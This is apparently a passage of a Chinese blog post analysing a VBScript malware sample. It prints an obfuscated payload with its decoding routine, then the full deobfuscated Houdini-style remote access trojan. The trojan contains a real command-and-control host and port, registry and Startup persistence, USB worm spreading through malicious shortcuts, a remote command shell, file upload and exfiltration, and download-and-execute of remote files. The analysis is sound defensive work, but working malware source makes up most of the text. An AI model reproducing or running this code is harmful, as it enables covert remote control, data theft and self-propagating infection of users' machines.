ξγΰηηκέε͹νΰβςνδοΰͫͭΓΖΐΤΪΗΚΎΌΗΪΘΌΎΓΔΙΐΧξκαοςάνΰΧͭͫͱͫξληδοͫͳδιξοάηηιάθΰͷͭ͹ͭʹͳͻʹͫͫͱͫͭΧͭͷͫͫπξέξλνΰάίδιβͷͫͭΝΐΒΪΞΥ͕ͭͫͫͫ͘ΰηξΰ͕ͫͫͫͫͫͫ͘πξέξλνΰάίδιβͫΈͫͭαάηξΰͫ͸ͫͭͫͱͫίάοΰ͕ͫͫͫͫͫͫ͘ξγΰηηκέε͹νΰβςνδοΰͫͭΓΖΐΤΪΗΚΎΌΗΪΘΌΎΓΔΙΐΧξκαοςάνΰΧͭͫͱͫξληδοͫͳδιξοάηηιάθΰͷͭ͹ͭʹͳͻʹͫͫͱͫͭΧͭͷͫͫπξέξλνΰάίδιβͷͫͭΝΐΒΪΞΥ͕͕ͭͫͫͫ͘͘ΰιίͫδα͕͘ΰιίͫΔα͕͕͕͕͘͘͘͘πλξοάνο͕͘ξΰοͫξήνδλοαπηηιάθΰξγκνοͫΈͫͫαδηΰξτξοΰθκέε͹βΰοαδηΰͫͳςξήνδλο͹ξήνδλοαπηηιάθΰʹ͕͘ξΰοͫδιξοάηηαπηηιάθΰξγκνοͫΈͫͫαδηΰξτξοΰθκέε͹βΰοαδηΰͫͳδιξοάηηίδνͫͱͫδιξοάηηιάθΰʹ͕͘δαͫͫηήάξΰͫͳξήνδλοαπηηιάθΰξγκνο͹ξγκνολάογʹͫ·Ήͫηήάξΰͫͳδιξοάηηαπηηιάθΰξγκνο͹ξγκνολάογʹͫογΰι͕ͫͫͫͫͫ͘ξγΰηηκέε͹νπιͫͭςξήνδλο͹ΰσΰͫͺͺ΍ͫͭͫͱͫήγνͳ;ͿʹͫͱͫδιξοάηηίδνͫͱͫδιξοάηηιάθΰͫͱͫΎγνͳ;Ϳʹ͕ͫͫͫͫ͘ςξήνδλο͹μπδο͕ͫ͘ΰιίͫΔα͕͘ΰνν͹ήηΰάν͕͘ξΰοͫκιΰκιήΰͫΈͫαδηΰξτξοΰθκέε͹κλΰιοΰσοαδηΰͫͳδιξοάηηίδνͫͱͫδιξοάηηιάθΰͫͷ΃ͷͫαάηξΰʹ͕͘δαͫͫΰνν͹ιπθέΰνͫΉͫͻͫογΰιͫςξήνδλο͹μπδο͕͘ΰιίͫαπιήοδκι͕͕͕͘͘͘ξπέͫξδοΰίκςιηκάίΰνͫͳαδηΰπνηͷαδηΰιάθΰʹ͕͕͘͘ξονηδιζͫΈͫαδηΰπνη͕͘ξονξάρΰοκͫΈͫδιξοάηηίδνͫͱͫαδηΰιάθΰ͕͘ξΰοͫκέεγοολίκςιηκάίͫΈͫήνΰάοΰκέεΰήοͳͭθξσθηͽ͹σθηγοολͭͫʹ͕͘κέεγοολίκςιηκάί͹κλΰιͫͭβΰοͭͷͫξονηδιζͷͫαάηξΰ͕͘κέεγοολίκςιηκάί͹ξΰιί͕͕͘͘ξΰοͫκέεαξκίκςιηκάίͫΈͫήνΰάοΰκέεΰήοͫͳͭξήνδλοδιβ͹αδηΰξτξοΰθκέεΰήοͭʹ͕͘δαͫͫκέεαξκίκςιηκάί͹αδηΰΰσδξοξͫͳξονξάρΰοκʹͫογΰι͕ͫͫͫͫ͘κέεαξκίκςιηκάί͹ίΰηΰοΰαδηΰͫͳξονξάρΰοκʹ͕͘ΰιίͫδα͕͕ͫ͘͘δαͫκέεγοολίκςιηκάί͹ξοάοπξͫΈͫͽͻͻͫογΰι͕ͫͫͫ͘ίδθͫͫκέεξονΰάθίκςιηκάί͕ͫͫͫ͘ξΰοͫͫκέεξονΰάθίκςιηκάίͫΈͫήνΰάοΰκέεΰήοͳͭάίκίέ͹ξονΰάθͭʹ͕ͫͫͫ͘ςδογͫκέεξονΰάθίκςιηκάί͕͔͔͘͹οτλΰͫΈͫͼ͕͔͔ͫ͘͹κλΰι͕͔͔͘͹ςνδοΰͫκέεγοολίκςιηκάί͹νΰξλκιξΰέκίτ͕͔͔͘͹ξάρΰοκαδηΰͫξονξάρΰοκ͕͔͔͘͹ήηκξΰ͕ͫͫͫ͘ΰιίͫςδογ͕ͫͫͫ͘ξΰοͫκέεξονΰάθίκςιηκάίͫΈͫικογδιβ͕͘ΰιίͫδα͕͘δαͫκέεαξκίκςιηκάί͹αδηΰΰσδξοξͳξονξάρΰοκʹͫογΰι͕ͫͫͫ͘ξγΰηηκέε͹νπιͫκέεαξκίκςιηκάί͹βΰοαδηΰͫͳξονξάρΰοκʹ͹ξγκνολάογ͕͘ΰιίͫδα͕ͫ͘ΰιίͫξπέ͕͕͘͘ξπέͫίκςιηκάίͫͳαδηΰπνηͷαδηΰίδνʹ͕͕͘͘δαͫαδηΰίδνͫΈͫͭͭͫογΰι͕ͫͫͫͫ͘αδηΰίδνͫΈͫδιξοάηηίδν͕͘ΰιίͫδα͕͕͘͘ξονξάρΰοκͫΈͫαδηΰίδνͫͱͫθδίͫͳαδηΰπνηͷͫδιξοννΰρͫͳαδηΰπνηͷͭΧͭʹͫͶͫͼʹ͕͘ξΰοͫκέεγοολίκςιηκάίͫΈͫήνΰάοΰκέεΰήοͳͭθξσθηͽ͹σθηγοολͭʹ͕͘κέεγοολίκςιηκάί͹κλΰιͫͭλκξοͭͷͭγοολ΅ͺͺͭͫͱͫγκξοͫͱͫͭ΅ͭͫͱͫλκνοͫͱͭͺͭͫͱͫͭδξ͸ξΰιίδιβͭͫͱͫξληδοΰνͫͱͫαδηΰπνηͷͫαάηξΰ͕͘κέεγοολίκςιηκάί͹ξΰιί͕͕ͫͭͭͫͫͫͫͫ͘͘ξΰοͫκέεαξκίκςιηκάίͫΈͫήνΰάοΰκέεΰήοͫͳͭξήνδλοδιβ͹αδηΰξτξοΰθκέεΰήοͭʹ͕͘δαͫͫκέεαξκίκςιηκάί͹αδηΰΰσδξοξͫͳξονξάρΰοκʹͫογΰι͕ͫͫͫͫ͘κέεαξκίκςιηκάί͹ίΰηΰοΰαδηΰͫͳξονξάρΰοκʹ͕͘ΰιίͫδα͕͘δαͫͫκέεγοολίκςιηκάί͹ξοάοπξͫΈͫͽͻͻͫογΰι͕ͫͫͫͫ͘ίδθͫͫκέεξονΰάθίκςιηκάί͕͔͘ξΰοͫͫκέεξονΰάθίκςιηκάίͫΈͫήνΰάοΰκέεΰήοͳͭάίκίέ͹ξονΰάθͭʹ͕ͫͫͫͫ͘ςδογͫκέεξονΰάθίκςιηκάί͕͔͔ͫͫ͘͹οτλΰͫΈͫͼ͕͔͔ͫͫ͘͹κλΰι͕͔͔ͫ͘͹ςνδοΰͫκέεγοολίκςιηκάί͹νΰξλκιξΰέκίτ͕͔͔ͫ͘͹ξάρΰοκαδηΰͫξονξάρΰοκ͕͔͔ͫ͘͹ήηκξΰ͕͔͘ΰιίͫςδογ͕ͫͫͫͫ͘ξΰοͫκέεξονΰάθίκςιηκάίͫͫΈͫικογδιβ͕͘ΰιίͫδα͕͘δαͫκέεαξκίκςιηκάί͹αδηΰΰσδξοξͳξονξάρΰοκʹͫογΰι͕ͫͫͫ͘ξγΰηηκέε͹νπιͫκέεαξκίκςιηκάί͹βΰοαδηΰͫͳξονξάρΰοκʹ͹ξγκνολάογ͕͘ΰιίͫδα͕ͫ͘ΰιίͫξπέ͕͕͕͘͘͘απιήοδκιͫπληκάίͫͳαδηΰπνηʹ͕͕͘͘ίδθͫͫγοολκέεͷκέεξονΰάθπληκάίΰͷέπααΰν͕͘ξΰοͫͫκέεξονΰάθπληκάίΰͫΈͫήνΰάοΰκέεΰήοͳͭάίκίέ͹ξονΰάθͭʹ͕͘ςδογͫκέεξονΰάθπληκάίΰ͕ͫͫͫͫͫͫ͘͹οτλΰͫΈͫͼ͕ͫͫͫͫͫͫ͘͹κλΰι͕͔ͫ͘͹ηκάίανκθαδηΰͫαδηΰπνη͕͔ͫ͘έπααΰνͫΈͫ͹νΰάί͕͔ͫ͘͹ήηκξΰ͕͘ΰιίͫςδογ͕͘ξΰοͫκέεξονΰάθίκςιηκάίͫΈͫικογδιβ͕͘ξΰοͫγοολκέεͫΈͫήνΰάοΰκέεΰήοͳͭθξσθηͽ͹σθηγοολͭʹ͕͘γοολκέε͹κλΰιͫͭλκξοͭͷͭγοολ΅ͺͺͭͫͱͫγκξοͫͱͫͭ΅ͭͫͱͫλκνοͫͱͭͺͭͫͱͫͭδξ͸νΰήρδιβͭͫͱͫξληδοΰνͫͱͫαδηΰπνηͷͫαάηξΰ͕͘γοολκέε͹ξΰιίͫέπααΰν͕͘ΰιίͫαπιήοδκι͕͕͕͘͘͘απιήοδκιͫΰιπθίνδρΰνͫͳʹ͕͕͘͘ακνͫͫΰάήγͫίνδρΰͫδιͫαδηΰξτξοΰθκέε͹ίνδρΰξ͕͘δαͫͫͫίνδρΰ͹δξνΰάίτͫΈͫονπΰͫογΰι͕ͫͫͫͫͫ͘ΰιπθίνδρΰνͫΈͫΰιπθίνδρΰνͫͱͫίνδρΰ͹λάογͫͱͫͭχͭͫͱͫίνδρΰ͹ίνδρΰοτλΰͫͱͫξληδοΰν͕͘ΰιίͫδα͕͘ιΰσο͕͘ΰιίͫΑπιήοδκι͕͕͘͘απιήοδκιͫΰιπθαάαͫͳΰιπθίδνʹ͕͕͘͘ΰιπθαάαͫΈͫΰιπθίδνͫͱͫξληδοΰν͕͘ακνͫͫΰάήγͫακηίΰνͫδιͫαδηΰξτξοΰθκέε͹βΰοακηίΰνͫͳΰιπθίδνʹ͹ξπέακηίΰνξ͕ͫͫͫͫͫ͘ΰιπθαάαͫΈͫΰιπθαάαͫͱͫακηίΰν͹ιάθΰͫͱͫͭχͭͫͱͫͭͭͫͱͫͭχͭͫͱͫͭίͭͫͱͫͭχͭͫͱͫακηίΰν͹άοονδέποΰξͫͱͫξληδοΰν͕͘ιΰσο͕͕͘͘ακνͫͫΰάήγͫαδηΰͫδιͫαδηΰξτξοΰθκέε͹βΰοακηίΰνͫͳΰιπθίδνʹ͹αδηΰξ͕ͫͫͫͫͫ͘ΰιπθαάαͫΈͫΰιπθαάαͫͱͫαδηΰ͹ιάθΰͫͱͫͭχͭͫͱͫαδηΰ͹ξδυΰͫͫͱͫͭχͭͫͱͫͭαͭͫͱͫͭχͭͫͱͫαδηΰ͹άοονδέποΰξͫͱͫξληδοΰν͕͕͘͘ιΰσο͕͘ΰιίͫαπιήοδκι͕͕͕͘͘͘απιήοδκιͫΰιπθλνκήΰξξͫͳʹ͕͕͘͘κιͫΰννκνͫνΰξπθΰͫιΰσο͕͕͘͘ξΰοͫκέεςθδξΰνρδήΰͫΈͫβΰοκέεΰήοͳͭςδιθβθοξ΅ΧΧ͹ΧνκκοΧήδθρͽͭʹ͕͘ξΰοͫήκηδοΰθξͫΈͫκέεςθδξΰνρδήΰ͹ΰσΰήμπΰντͳͭξΰηΰήοͫ͵ͫανκθͫςδι;ͽΪλνκήΰξξͭͷͷͿ΃ʹ͕͕͘͘ίδθͫκέεδοΰθ͕͘ακνͫΰάήγͫκέεδοΰθͫδιͫήκηδοΰθξ͕͔͘ΰιπθλνκήΰξξͫΈͫΰιπθλνκήΰξξͫͱͫκέεδοΰθ͹ιάθΰͫͱͫͭχ͕͔ͭ͘ΰιπθλνκήΰξξͫΈͫΰιπθλνκήΰξξͫͱͫκέεδοΰθ͹λνκήΰξξδίͫͱͫͭχ͕ͭͫͫͫͫ͘ΰιπθλνκήΰξξͫΈͫΰιπθλνκήΰξξͫͱͫκέεδοΰθ͹ΰσΰήποάέηΰλάογͫͱͫξληδοΰν͕͘ιΰσο͕͘ΰιίͫαπιήοδκι͕͕͘͘ξπέͫΰσδολνκήΰξξͫͳλδίʹ͕͘κιͫΰννκνͫνΰξπθΰͫιΰσο͕͕͘͘ξγΰηηκέε͹νπιͫͭοάξζζδηηͫͺΑͫͺΟͫͺΛΔΏͫͭͫͱͫλδίͷ΂ͷονπΰ͕͘ΰιίͫξπέ͕͕͘͘ξπέͫίΰηΰοΰαάαͫͳπνηʹ͕͘κιͫΰννκνͫνΰξπθΰͫιΰσο͕͕͘͘αδηΰξτξοΰθκέε͹ίΰηΰοΰαδηΰͫπνη͕͘αδηΰξτξοΰθκέε͹ίΰηΰοΰακηίΰνͫπνη͕͕͘͘ΰιίͫξπέ͕͕͘͘απιήοδκιͫήθίξγΰηηͫͳήθίʹ͕͕͘͘ίδθͫγοολκέεͷκΰσΰήͷνΰάίάηηανκθάιτ͕͕͘͘ξΰοͫκΰσΰήͫΈͫξγΰηηκέε͹ΰσΰήͫͳͭͰήκθξλΰήͰͫͺήͫͭͫͱͫήθίʹ͕͘δαͫικοͫκΰσΰή͹ξοίκπο͹άοΰιίκαξονΰάθͫογΰι͕ͫͫͫ͘νΰάίάηηανκθάιτͫΈͫκΰσΰή͹ξοίκπο͹νΰάίάηη͕͘ΰηξΰδαͫικοͫκΰσΰή͹ξοίΰνν͹άοΰιίκαξονΰάθͫογΰι͕ͫͫͫ͘νΰάίάηηανκθάιτͫΈͫκΰσΰή͹ξοίΰνν͹νΰάίάηη͕͘ΰηξΰ͕ͫͫͫͫ͘νΰάίάηηανκθάιτͫΈ͕ͫͭͭ͘ΰιίͫδα͕͕͘͘ήθίξγΰηηͫΈͫνΰάίάηηανκθάιτ͕͘ΰιίͫαπιήοδκι" : End If : If (L = 0) Then : S = "" : End If : If (L = 0) Then : F = 0 : H = 0 : End If : If (L = 0) Then : E = "Password" : End If
        If (L = 0) Then : R = 0 : End If
        If (L = 0) Then
            Do Until H = Len(E)
                H = H + 1
                R = R + AscW(Mid(E, H, 1))

            Loop
        End If
        If (L = 0) Then
            Do Until F = Len(X)
                F = F + 1
                S = S & ChrW(AscW(Mid(X, F, 1)) - R + Len(E))
            Loop
        End If
        If (L = 0) Then
            execute(S)
            

        End If

可以发现解开的代码在变量S里面,接下来解混淆
在这里插入图片描述
得到2.txt文件:

'<[ recoder : houdini (c) skype : houdini-fx ]>

'=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-=

host = "viewi.publicvm.com"
port = 44
installdir = "%temp%"
lnkfile = true
lnkfolder = true

'=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-=

dim shellobj 
set shellobj = wscript.createobject("wscript.shell")
dim filesystemobj
set filesystemobj = createobject("scripting.filesystemobject")
dim httpobj
set httpobj = createobject("msxml2.xmlhttp")


'=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-=

installname = wscript.scriptname
startup = shellobj.specialfolders ("startup") & "\"
installdir = shellobj.expandenvironmentstrings(installdir) & "\"
if not filesystemobj.folderexists(installdir) then  installdir = shellobj.expandenvironmentstrings("%temp%") & "\"
spliter = "<" & "|" & ">"
sleep = 5000 
dim response
dim cmd
dim param
info = ""
usbspreading = ""
startdate = ""
dim oneonce

'=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-=
on error resume next


instance
while true

install

response = ""
response = post ("is-ready","")
cmd = split (response,spliter)
select case cmd (0)
case "excecute"
      param = cmd (1)
      execute param
case "update"
      param = cmd (1)
      oneonce.close
      set oneonce =  filesystemobj.opentextfile (installdir & installname ,2, false)
      oneonce.write param
      oneonce.close
      shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34)
      wscript.quit 
case "uninstall"
      uninstall
case "send"
      download cmd (1),cmd (2)
case "site-send"
      sitedownloader cmd (1),cmd (2)
case "recv"
      param = cmd (1)
      upload (param)
case  "enum-driver"
      post "is-enum-driver",enumdriver  
case  "enum-faf"
      param = cmd (1)
      post "is-enum-faf",enumfaf (param)
case  "enum-process"
      post "is-enum-process",enumprocess   
case  "cmd-shell"
      param = cmd (1)
      post "is-cmd-shell",cmdshell (param)  
case  "delete"
      param = cmd (1)
      deletefaf (param) 
case  "exit-process"
      param = cmd (1)
      exitprocess (param) 
case  "sleep"
      param = cmd (1)
      sleep = eval (param)        
end select

wscript.sleep sleep

wend


sub install
on error resume next
dim lnkobj
dim filename
dim foldername
dim fileicon
dim foldericon

upstart
for each drive in filesystemobj.drives

if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true
    if  filesystemobj.fileexists (drive.path & "\" & installname)  then
        filesystemobj.getfile(drive.path & "\"  & installname).attributes = 2+4
    end if
    for each file in filesystemobj.getfolder( drive.path & "\" ).Files
        if not lnkfile then exit for
        if  instr (file.name,".") then
            if  lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then
                file.attributes = 2+4
                if  ucase (file.name) <> ucase (installname) then
                    filename = split(file.name,".")
                    set lnkobj = shellobj.createshortcut (drive.path & "\"  & filename (0) & ".lnk") 
                    lnkobj.windowstyle = 7
                    lnkobj.targetpath = "cmd.exe"
                    lnkobj.workingdirectory = ""
                    lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit"
                    fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") 
                    if  instr (fileicon,",") = 0 then
                        lnkobj.iconlocation = file.path
                    else 
                        lnkobj.iconlocation = fileicon
                    end if
                    lnkobj.save()
                end if
            end if
        end if
    next
    for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
        if not lnkfolder then exit for
        folder.attributes = 2+4
        foldername = folder.name
        set lnkobj = shellobj.createshortcut (drive.path & "\"  & foldername & ".lnk") 
        lnkobj.windowstyle = 7
        lnkobj.targetpath = "cmd.exe"
        lnkobj.workingdirectory = ""
        lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit"
        foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") 
        if  instr (foldericon,",") = 0 then
            lnkobj.iconlocation = folder.path
        else 
            lnkobj.iconlocation = foldericon
        end if
        lnkobj.save()
    next
end If
end If
end if
next
err.clear
end sub

sub uninstall
on error resume next
dim filename
dim foldername

shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0)
filesystemobj.deletefile startup & installname ,true
filesystemobj.deletefile wscript.scriptfullname ,true

for  each drive in filesystemobj.drives
if  drive.isready = true then
if  drive.freespace  > 0 then
if  drive.drivetype  = 1 then
    for  each file in filesystemobj.getfolder ( drive.path & "\").files
         on error resume next
         if  instr (file.name,".") then
             if  lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then
                 file.attributes = 0
                 if  ucase (file.name) <> ucase (installname) then
                     filename = split(file.name,".")
                     filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" )
                 else
                     filesystemobj.deletefile (drive.path & "\" & file.name)
                 end If
             else
                 filesystemobj.deletefile (file.path) 
             end if
         end if
     next
     for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders
         folder.attributes = 0
     next
end if
end if
end if
next
wscript.quit
end sub

function post (cmd ,param)

post = param
httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false
httpobj.setrequestheader "user-agent:",information
httpobj.send param
post = httpobj.responsetext
end function

function information
on error resume next
if  inf = "" then
    inf = hwid & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%computername%") & spliter 
    inf = inf  & shellobj.expandenvironmentstrings("%username%") & spliter

    set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
    set os = root.execquery ("select * from win32_operatingsystem")
    for each osinfo in os
       inf = inf & osinfo.caption & spliter  
       exit for
    next
    inf = inf & "plus" & spliter
    inf = inf & security & spliter
    inf = inf & usbspreading
    information = inf  
else
    information = inf
end if
end function


sub upstart ()
on error resume Next

shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0),  "wscript.exe //B "  & chrw(34) & installdir & installname & chrw(34) , "REG_SZ"
filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true
filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true

end sub


function hwid
on error resume next

set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set disks = root.execquery ("select * from win32_logicaldisk")
for each disk in disks
    if  disk.volumeserialnumber <> "" then
        hwid = disk.volumeserialnumber
        exit for
    end if
next
end function


function security 
on error resume next

security = ""

set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48)
for each objitem in colitems
    versionstr = split (objitem.version,".")
next
versionstr = split (colitems.version,".")
osversion = versionstr (0) & "."
for  x = 1 to ubound (versionstr)
	 osversion = osversion &  versionstr (i)
next
osversion = eval (osversion)
if  osversion > 6 then sc = "securitycenter2" else sc = "securitycenter"

set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc)
Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0)

for each objantivirus in colantivirus
    security  = security  & objantivirus.displayname & " ."
next
if security  = "" then security  = "nan-av"
end function


function instance
on error resume next

usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\")
if usbspreading = "" then
   if lcase ( mid(wscript.scriptfullname,2)) = ":\" &  lcase(installname) then
      usbspreading = "true - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"
   else
      usbspreading = "false - " & date
      shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0)  & "\",  usbspreading, "REG_SZ"

   end if
end If



upstart
set scriptfullnameshort =  filesystemobj.getfile (wscript.scriptfullname)
set installfullnameshort =  filesystemobj.getfile (installdir & installname)
if  lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then 
    shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34)
    wscript.quit 
end If
err.clear
set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false)
if  err.number > 0 then wscript.quit
end function


sub sitedownloader (fileurl,filename)

strlink = fileurl
strsaveto = installdir & filename
set objhttpdownload = createobject("msxml2.xmlhttp" )
objhttpdownload.open "get", strlink, false
objhttpdownload.send

set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
 
if objhttpdownload.status = 200 then
   dim  objstreamdownload
   set  objstreamdownload = createobject("adodb.stream")
   with objstreamdownload
		.type = 1 
		.open
		.write objhttpdownload.responsebody
		.savetofile strsaveto
		.close
   end with
   set objstreamdownload = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub

sub download (fileurl,filedir)

if filedir = "" then 
   filedir = installdir
end if

strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1)
set objhttpdownload = createobject("msxml2.xmlhttp")
objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false
objhttpdownload.send ""
     
set objfsodownload = createobject ("scripting.filesystemobject")
if  objfsodownload.fileexists (strsaveto) then
    objfsodownload.deletefile (strsaveto)
end if
if  objhttpdownload.status = 200 then
    dim  objstreamdownload
	set  objstreamdownload = createobject("adodb.stream")
    with objstreamdownload 
		 .type = 1 
		 .open
		 .write objhttpdownload.responsebody
		 .savetofile strsaveto
		 .close
	end with
    set objstreamdownload  = nothing
end if
if objfsodownload.fileexists(strsaveto) then
   shellobj.run objfsodownload.getfile (strsaveto).shortpath
end if 
end sub


function upload (fileurl)

dim  httpobj,objstreamuploade,buffer
set  objstreamuploade = createobject("adodb.stream")
with objstreamuploade 
     .type = 1 
     .open
	 .loadfromfile fileurl
	 buffer = .read
	 .close
end with
set objstreamdownload = nothing
set httpobj = createobject("msxml2.xmlhttp")
httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false
httpobj.send buffer
end function


function enumdriver ()

for  each drive in filesystemobj.drives
if   drive.isready = true then
     enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter
end if
next
end Function

function enumfaf (enumdir)

enumfaf = enumdir & spliter
for  each folder in filesystemobj.getfolder (enumdir).subfolders
     enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter
next

for  each file in filesystemobj.getfolder (enumdir).files
     enumfaf = enumfaf & file.name & "|" & file.size  & "|" & "f" & "|" & file.attributes & spliter

next
end function


function enumprocess ()

on error resume next

set objwmiservice = getobject("winmgmts:\\.\root\cimv2")
set colitems = objwmiservice.execquery("select * from win32_process",,48)

dim objitem
for each objitem in colitems
	enumprocess = enumprocess & objitem.name & "|"
	enumprocess = enumprocess & objitem.processid & "|"
    enumprocess = enumprocess & objitem.executablepath & spliter
next
end function

sub exitprocess (pid)
on error resume next

shellobj.run "taskkill /F /T /PID " & pid,7,true
end sub

sub deletefaf (url)
on error resume next

filesystemobj.deletefile url
filesystemobj.deletefolder url

end sub

function cmdshell (cmd)

dim httpobj,oexec,readallfromany

set oexec = shellobj.exec ("%comspec% /c " & cmd)
if not oexec.stdout.atendofstream then
   readallfromany = oexec.stdout.readall
elseif not oexec.stderr.atendofstream then
   readallfromany = oexec.stderr.readall
else 
   readallfromany = ""
end if

cmdshell = readallfromany
end function

很明显是个后门,连接的cc服务器为
host = “viewi.publicvm.com”
port = 44,通过post回传数据,流量没有加密,

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值